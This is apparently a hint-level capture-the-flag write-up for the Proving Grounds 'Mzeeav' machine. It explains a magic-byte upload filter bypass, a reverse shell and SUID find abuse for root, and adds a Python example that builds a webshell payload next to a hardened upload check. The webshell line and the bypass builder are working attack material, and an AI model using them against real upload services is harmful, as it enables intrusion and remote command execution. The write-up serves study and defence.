April 2, 2025

Mzeeav Proving Grounds Write-Up

Proving Grounds Mzeeav machine walkthrough

SUMMARY

This write-up covers the Mzeeav machine from OffSec’s Proving Grounds, a Linux machine where a file upload filter that checked only for PE magic bytes was bypassed to land a PHP webshell.

Port 80 hosted a file upload service. A backup ZIP found through directory fuzzing contained the PHP source code, revealing that upload.php validated uploads by checking for the PE magic bytes (the "MZ" header, 0x4D 0x5A, that every Windows executable starts with) and did not restrict the file extension. Because PHP executes a <?php ... ?> block regardless of the bytes that precede it, prepending the .exe magic bytes to a PHP webshell and intercepting the upload with Burp Suite was enough to pass the filter. The uploaded file was accessed at /uploads/cmd.php, confirming command execution as www-data. A reverse shell followed.
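To make the filter weakness concrete, here is an added example (my own code, not the machine’s upload.php and not from the original write-up) that models a magic-byte-only check, builds the kind of payload the write-up describes, and contrasts it with a stricter check. The function names, the sample webshell body, and the hardened variant are assumptions for illustration; the real fix is also to store uploads outside any PHP-executing directory.

```python
"""Added example: why validating an upload on PE magic bytes alone does not stop PHP.

Models the check described in the write-up (accept if the file starts with the PE
signature) and the bypass (prepend those bytes to a PHP webshell). The function
names and the hardened check are this example's own assumptions, not upload.php.
"""
import re

# 0x4D 0x5A: the DOS/PE header signature every Windows .exe begins with.
PE_MAGIC = b"MZ"

# Constructed sample webshell body; the page only says "a PHP webshell" was used.
WEBSHELL = b"<?php system($_GET['cmd']); ?>"


def vulnerable_is_valid_upload(data: bytes) -> bool:
    """Assumed shape of the weak check: accept anything starting with the PE signature.

    Nothing here looks at the extension or at what follows the two magic bytes.
    """
    return data.startswith(PE_MAGIC)


def build_bypass_payload(webshell: bytes = WEBSHELL) -> bytes:
    """Prepend the PE magic bytes to the PHP source.

    PHP emits the leading "MZ" as literal output and still executes the
    <?php ... ?> block, so the file stays a working webshell.
    """
    return PE_MAGIC + webshell


def php_would_execute(data: bytes) -> bool:
    """PHP runs code wherever an opening tag appears, whatever precedes it."""
    return b"<?php" in data or b"<?=" in data


# Hardened variant (assumed design, not from the page).
ALLOWED_EXTENSIONS = {"exe"}
MIN_DOS_HEADER_LEN = 64  # a real PE file has at least a full 64-byte DOS header
PHP_OPEN_TAG = re.compile(rb"<\?")  # catches <?php, <?= and short tags


def hardened_is_valid_upload(filename: str, data: bytes) -> bool:
    """Stricter check: extension allowlist, a plausible PE header, no PHP open tags.

    Content checks are belt-and-braces only; uploads must also be written to a
    directory the web server does not execute PHP from, under a server-chosen name.
    """
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED_EXTENSIONS:
        return False
    if not data.startswith(PE_MAGIC) or len(data) < MIN_DOS_HEADER_LEN:
        return False
    if PHP_OPEN_TAG.search(data):
        return False
    return True


if __name__ == "__main__":
    payload = build_bypass_payload()
    print("weak check accepts payload:", vulnerable_is_valid_upload(payload))
    print("PHP would execute it:", php_would_execute(payload))
    print("hardened check accepts cmd.php:", hardened_is_valid_upload("cmd.php", payload))
```

Running the weak check against the payload returns True while the hardened check rejects it on the extension alone, which is the point: the magic bytes say nothing about how the server will interpret the file once it sits under /uploads/ with a .php name.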

Privilege escalation came from a custom SUID binary named fileS in /opt. Running it produced output identical to find, which pointed to a renamed copy of that binary, so the GTFOBins technique for SUID find applied and spawned a root shell. One caveat when trying it: the -p flag on the spawned shell in that one-liner matters, since without it sh drops the elevated effective UID.


PATH TO FOLLOW

  1. Reconnaissance & File Upload Portal Discovery
  2. Backup ZIP Extraction → upload.php Source Code Review
  3. PE Magic Bytes Prepend → PHP Webshell Upload Bypass
  4. Webshell Access → Reverse Shell as www-data
  5. SUID fileS Discovery → GTFOBins find Abuse → Shell as Root

Due to OffSec’s policy on content sharing, these write-ups provide hints only rather than full solutions. I know, boring stuff.